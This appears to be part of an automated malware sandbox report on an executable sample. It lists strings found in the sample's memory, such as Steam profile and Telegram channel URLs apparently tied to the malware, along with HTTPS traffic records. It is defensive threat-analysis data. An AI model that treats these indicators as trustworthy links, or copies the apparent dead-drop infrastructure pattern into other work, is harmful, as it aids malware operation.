Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619/inventory/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619?
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619E
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619G
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619_
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2523079878.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619i
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619p1up1Mozilla/5.0
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619stea%
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://steamcommunity.com/profiles/76561199804377619tlq
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://store.steampowered.com/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;)
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837734458.0000000000A78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/;a(
Source: 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://store.steampowered.com/about/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://store.steampowered.com/explore/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748291843.0000000000193000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: https://store.steampowered.com/leg
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://store.steampowered.com/legal/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://store.steampowered.com/mobile
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://store.steampowered.com/news/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://store.steampowered.com/points/shop/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://store.steampowered.com/stats/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/_~
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000000.1785190377.000000000045C000.00000008.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr | String found in binary or memory: https://t.me/m3wm0w
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1812013102.0000000000A47000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/m3wm0w3
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/m3wm0w7
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/m3wm0wT
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A47000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/m3wm0wc
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr | String found in binary or memory: https://t.me/m3wm0wp1up1Mozilla/5.0
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.00000000009CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://t.me/y~
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://telegram.org/img/t_logo_2x.png
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://web.telegram.org
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/recaptcha/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A31000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr | String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A45000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A12000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.youtube.com/
Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
